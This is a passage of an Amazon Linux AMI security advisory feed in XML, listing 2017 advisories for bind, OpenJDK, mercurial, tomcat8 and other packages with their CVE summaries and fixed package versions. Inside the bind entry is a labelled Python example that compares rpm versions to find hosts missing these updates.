</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368" title="" id="CVE-2017-1000368" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1574.html" title="" id="RHSA-2017:1574" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-29.27.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-29.27.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-29.27.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-29.27.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-29.27.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-29.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-856</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-856: important priority package update for mercurial</title><issued date="2017-07-06 19:06:00" /><updated date="2017-07-06 22:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9462:
A flaw was found in the way the &quot;hg serve --stdio&quot; command in Mercurial handled command-line options. A remote, authenticated attacker could use this flaw to execute arbitrary code on the Mercurial server by using specially crafted command-line options.
1459482:
CVE-2017-9462 mercurial: Python debugger accessible to authorized users
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9462" title="" id="CVE-2017-9462" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mercurial-python27" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python27-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="mercurial-python26" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python26-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="mercurial-common" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-common-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="mercurial-debuginfo" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-debuginfo-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial-el" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-el-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="mercurial-python26" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python26-3.7.3-1.28.amzn1.i686.rpm</filename></package><package name="mercurial-debuginfo" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-debuginfo-3.7.3-1.28.amzn1.i686.rpm</filename></package><package name="mercurial-common" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-common-3.7.3-1.28.amzn1.i686.rpm</filename></package><package name="mercurial-python27" version="3.7.3" release="1.28.amzn1" epoch="0" 
arch="i686"><filename>Packages/mercurial-python27-3.7.3-1.28.amzn1.i686.rpm</filename></package><package name="emacs-mercurial-el" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-el-3.7.3-1.28.amzn1.i686.rpm</filename></package><package name="emacs-mercurial" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-3.7.3-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-857</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-857: medium priority package update for golang</title><issued date="2017-07-13 19:37:00" /><updated date="2017-07-14 23:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8932:
A carry propagation flaw was found in the implementation of the P-256 elliptic curve in golang. An attacker could use this flaw to extract private keys when static ECDH is used.
1455189:
CVE-2017-8932 golang: Elliptic curves carry propagation issue in x86-64 P-256
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8932" title="" id="CVE-2017-8932" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-tests" version="1.7.5" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.7.5-2.39.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.7.5" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.7.5-2.39.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.7.5" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.7.5-2.39.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.7.5" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.7.5-2.39.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.7.5" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.7.5-2.39.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.7.5" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.7.5-2.39.amzn1.noarch.rpm</filename></package><package name="golang" version="1.7.5" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.7.5-2.39.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.7.5" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.7.5-2.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-858</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-858: important priority package update for bind</title><issued date="2017-07-20 01:20:00" /><updated date="2017-07-24 23:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix 
the following vulnerabilities:
CVE-2017-3143:
* A flaw was found in the way BIND handled TSIG authentication for dynamic updates. A remote attacker able to communicate with an authoritative BIND server could use this flaw to manipulate the contents of a zone, by forging a valid TSIG or SIG(0) signature for a dynamic update request.
CVE-2017-3142:
* A flaw was found in the way BIND handled TSIG authentication of AXFR requests. A remote attacker, able to communicate with an authoritative BIND server, could use this flaw to view the entire contents of a zone by sending a specially constructed request packet.
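Acting on any advisory in this file means comparing the epoch, version and release of each package element against what rpm reports as installed, and that comparison has to follow rpm's own rules (the bind release 0.62.rc1.56.amzn1 above mixes numeric and alphabetic segments, and bind carries epoch 32). The following is an added example, not code from the page or from Amazon Linux: a simplified port of rpmvercmp, a walker over the update, reference and package elements, and a check of a constructed host inventory against a constructed updateinfo fragment modelled on ALAS-2017-858, ALAS-2017-848 and ALAS-2017-855 on this page.

```python
import re
import xml.etree.ElementTree as ET


def rpmvercmp(a, b):
    """Simplified port of rpm's rpmvercmp (no '~' or '^' handling): split both strings
    into runs of digits and runs of letters and compare segment by segment.
    Returns 1 if a is newer, -1 if b is newer, 0 if they are equal."""
    if a == b:
        return 0
    seg_a = re.findall(r"[0-9]+|[A-Za-z]+", a)
    seg_b = re.findall(r"[0-9]+|[A-Za-z]+", b)
    for x, y in zip(seg_a, seg_b):
        if x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1   # a numeric segment is newer than an alpha one
        if x.isdigit():
            x, y = int(x), int(y)             # numeric compare, so leading zeros do not matter
        if x != y:
            return 1 if x > y else -1
    if len(seg_a) == len(seg_b):
        return 0
    return 1 if len(seg_a) > len(seg_b) else -1  # whichever still has segments left is newer


def evr_cmp(evr1, evr2):
    """Compare (epoch, version, release) tuples: epoch decides first, then version, then release."""
    e1, v1, r1 = evr1
    e2, v2, r2 = evr2
    if int(e1) != int(e2):
        return 1 if int(e1) > int(e2) else -1
    c = rpmvercmp(v1, v2)
    return c if c != 0 else rpmvercmp(r1, r2)


def iter_advisories(root):
    """Yield one dict per update element: id, severity, CVE ids and the fixed packages."""
    for u in root.iter("update"):
        yield {
            "id": u.findtext("id"),
            "severity": u.findtext("severity"),
            "cves": [r.get("id") for r in u.iter("reference") if r.get("type") == "cve"],
            "packages": [(p.get("name"), p.get("arch"),
                          (p.get("epoch", "0"), p.get("version"), p.get("release")))
                         for p in u.iter("package")],
        }


def missing_updates(root, installed):
    """installed maps (name, arch) to (epoch, version, release). Returns every advisory
    package that is newer than the installed one; packages not installed are ignored."""
    out = []
    for adv in iter_advisories(root):
        for name, arch, fixed in adv["packages"]:
            have = installed.get((name, arch))
            if have is not None and evr_cmp(fixed, have) == 1:
                out.append({"advisory": adv["id"], "severity": adv["severity"], "cves": adv["cves"],
                            "package": name, "arch": arch,
                            "installed": "%s:%s-%s" % have, "fixed": "%s:%s-%s" % fixed})
    return out


def build_sample_updateinfo():
    """Constructed fragment in the layout of the Amazon Linux updateinfo.xml (not the real file)."""
    root = ET.Element("updates")

    def add(aid, sev, cves, pkgs):
        u = ET.SubElement(root, "update", status="final", type="security")
        ET.SubElement(u, "id").text = aid
        ET.SubElement(u, "severity").text = sev
        refs = ET.SubElement(u, "references")
        for cve in cves:
            ET.SubElement(refs, "reference", id=cve, type="cve")
        coll = ET.SubElement(ET.SubElement(u, "pkglist"), "collection", short="amazon-linux-ami")
        for name, arch, (epoch, ver, rel) in pkgs:
            p = ET.SubElement(coll, "package", name=name, epoch=epoch, version=ver, release=rel, arch=arch)
            ET.SubElement(p, "filename").text = "Packages/%s-%s-%s.%s.rpm" % (name, ver, rel, arch)

    add("ALAS-2017-858", "important", ["CVE-2017-3142", "CVE-2017-3143"],
        [("bind", "x86_64", ("32", "9.8.2", "0.62.rc1.56.amzn1")),
         ("bind-libs", "x86_64", ("32", "9.8.2", "0.62.rc1.56.amzn1"))])
    add("ALAS-2017-848", "important", ["CVE-2017-7502"],
        [("nss", "x86_64", ("0", "3.28.4", "1.2.79.amzn1"))])
    add("ALAS-2017-855", "medium", ["CVE-2017-1000368"],
        [("sudo", "x86_64", ("0", "1.8.6p3", "29.27.amzn1"))])
    # Serialise and re-parse so the walk runs over XML text, as it would on the yum cache file.
    return ET.fromstring(ET.tostring(root))


# Constructed inventory of a hypothetical host: bind-libs one release behind, nss current,
# sudo already newer than the advisory, bind itself not installed.
SAMPLE_INSTALLED = {
    ("bind-libs", "x86_64"): ("32", "9.8.2", "0.62.rc1.55.amzn1"),
    ("nss", "x86_64"): ("0", "3.28.4", "1.2.79.amzn1"),
    ("sudo", "x86_64"): ("0", "1.8.6p3", "29.28.amzn1"),
}

if __name__ == "__main__":
    for m in missing_updates(build_sample_updateinfo(), SAMPLE_INSTALLED):
        print(m)
```

Against the sample inventory only bind-libs from ALAS-2017-858 comes back. For a real host, parse /var/cache/yum/x86_64/latest/amzn-updates/gen/updateinfo.xml with ET.parse(path).getroot() and build the inventory from the output of rpm -qa --qf '%{NAME} %{ARCH} %{EPOCHNUM} %{VERSION} %{RELEASE}\n'. On the host itself yum updateinfo list security does this natively; the port is for checking an inventory offline or from another machine. It omits rpm's tilde and caret rules, which none of the versions on this page use.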
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3142" title="" id="CVE-2017-3142" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3143" title="" id="CVE-2017-3143" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1679.html" title="" id="RHSA-2017:1679" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-libs-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-859</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-859: medium priority package update for c-ares</title><issued date="2017-07-20 01:22:00" /><updated date="2017-07-24 23:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000381:
The c-ares function `ares_parse_naptr_reply()`, which is used for parsing NAPTR responses, could be triggered to read memory outside of the given input buffer if the passed in DNS response packet was crafted in a particular way.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000381" title="" id="CVE-2017-1000381" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="c-ares-devel" version="1.13.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-devel-1.13.0-1.5.amzn1.x86_64.rpm</filename></package><package name="c-ares" version="1.13.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-1.13.0-1.5.amzn1.x86_64.rpm</filename></package><package name="c-ares-debuginfo" version="1.13.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-debuginfo-1.13.0-1.5.amzn1.x86_64.rpm</filename></package><package name="c-ares-devel" version="1.13.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-devel-1.13.0-1.5.amzn1.i686.rpm</filename></package><package name="c-ares-debuginfo" version="1.13.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-debuginfo-1.13.0-1.5.amzn1.i686.rpm</filename></package><package name="c-ares" version="1.13.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-1.13.0-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-860</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-860: critical priority package update for java-1.8.0-openjdk</title><issued date="2017-07-25 17:54:00" /><updated date="2017-07-25 17:56:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10198:
It was discovered that the Security component of OpenJDK could fail to properly enforce restrictions defined for processing of X.509 certificate chains. A remote attacker could possibly use this flaw to make Java accept a certificate using one of the disabled algorithms.
1472320:
CVE-2017-10198 OpenJDK: incorrect enforcement of certificate path restrictions (Security, 8179998)
CVE-2017-10193:
1471715:
CVE-2017-10193 OpenJDK: incorrect key size constraint check (Security, 8179101)
CVE-2017-10135:
A covert timing channel flaw was found in the PKCS#8 implementation in the JCE component of OpenJDK. A remote attacker able to make a Java application repeatedly compare a PKCS#8 key against an attacker-controlled value could possibly use this flaw to determine the key via a timing side channel.
1471871:
CVE-2017-10135 OpenJDK: PKCS#8 implementation timing attack (JCE, 8176760)
CVE-2017-10116:
It was discovered that the LDAPCertStore class in the Security component of OpenJDK followed LDAP referrals to arbitrary URLs. A specially crafted LDAP referral URL could cause LDAPCertStore to communicate with non-LDAP servers.
1471738:
CVE-2017-10116 OpenJDK: LDAPCertStore following referrals to non-LDAP URLs (Security, 8176067)
CVE-2017-10115:
A covert timing channel flaw was found in the DSA implementation in the JCE component of OpenJDK. A remote attacker able to make a Java application generate DSA signatures on demand could possibly use this flaw to extract certain information about the used key via a timing side channel.
1471851:
CVE-2017-10115 OpenJDK: DSA implementation timing attack (JCE, 8175106)
CVE-2017-10111:
1471526:
CVE-2017-10111 OpenJDK: incorrect range checks in LambdaFormEditor (Libraries, 8184185)
CVE-2017-10110:
1471523:
CVE-2017-10110 OpenJDK: insufficient access control checks in ImageWatched (AWT, 8174098)
CVE-2017-10109:
1471670:
CVE-2017-10109 OpenJDK: unbounded memory allocation in CodeSource deserialization (Serialization, 8174113)
CVE-2017-10108:
1471888:
CVE-2017-10108 OpenJDK: unbounded memory allocation in BasicAttribute deserialization (Serialization, 8174105)
CVE-2017-10107:
1471266:
CVE-2017-10107 OpenJDK: insufficient access control checks in ActivationID (RMI, 8173697)
CVE-2017-10102:
It was discovered that the DGC implementation in the RMI component of OpenJDK failed to correctly handle references. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the RMI registry or a Java RMI application.
1472345:
CVE-2017-10102 OpenJDK: incorrect handling of references in DGC (RMI, 8163958)
CVE-2017-10101:
1471527:
CVE-2017-10101 OpenJDK: unrestricted access to com.sun.org.apache.xml.internal.resolver (JAXP, 8173286)
CVE-2017-10096:
1471528:
CVE-2017-10096 OpenJDK: insufficient access control checks in XML transformations (JAXP, 8172469)
CVE-2017-10090:
1471517:
CVE-2017-10090 OpenJDK: insufficient access control checks in AsynchronousChannelGroupImpl (8172465, Libraries)
CVE-2017-10074:
1471534:
CVE-2017-10074 OpenJDK: integer overflows in range check loop predicates (Hotspot, 8173770)
CVE-2017-10067:
1471535:
CVE-2017-10067 OpenJDK: JAR verifier incorrect handling of missing digest (Security, 8169392)
CVE-2017-10053:
It was discovered that the JPEGImageReader implementation in the 2D component of OpenJDK would, in certain cases, read all image data even if it was not used later. A specially crafted image could cause a Java application to temporarily use an excessive amount of CPU and memory.
1471889:
CVE-2017-10053 OpenJDK: reading of unprocessed image data in JPEGImageReader (2D, 8169209)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10053" title="" id="CVE-2017-10053" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10067" title="" id="CVE-2017-10067" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10074" title="" id="CVE-2017-10074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10090" title="" id="CVE-2017-10090" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10096" title="" id="CVE-2017-10096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10101" title="" id="CVE-2017-10101" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10102" title="" id="CVE-2017-10102" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10107" title="" id="CVE-2017-10107" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10108" title="" id="CVE-2017-10108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10109" title="" id="CVE-2017-10109" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10110" title="" id="CVE-2017-10110" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10111" title="" id="CVE-2017-10111" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10115" title="" id="CVE-2017-10115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10116" title="" id="CVE-2017-10116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10135" title="" id="CVE-2017-10135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10193" title="" id="CVE-2017-10193" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10198" title="" id="CVE-2017-10198" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.141-1.b16.32.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.141-1.b16.32.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-861</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-861: important priority package update for aws-cfn-bootstrap</title><issued date="2017-07-25 18:33:00" /><updated date="2017-08-04 03:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9450:
A vulnerability was reported in the CloudFormation bootstrap tools that allows an attacker to execute arbitrary code as root if they have local access to the system and are able to create files in a specific directory (CVE-2017-9450).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9450" title="" id="CVE-2017-9450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="aws-cfn-bootstrap" version="1.4" release="19.10.amzn1" epoch="0" arch="noarch"><filename>Packages/aws-cfn-bootstrap-1.4-19.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-862</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-862: important priority package update for tomcat8</title><issued date="2017-08-03 18:49:00" /><updated date="2017-08-31 23:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7674:
The CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.
1480618:
CVE-2017-7674 tomcat: Vary header not added by CORS filter leading to cache poisoning
CVE-2017-5664:
A vulnerability was discovered in the error page mechanism in Tomcat&#039;s DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page.
1459158:
CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5664" title="" id="CVE-2017-5664" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7674" title="" id="CVE-2017-7674" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-webapps" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package 
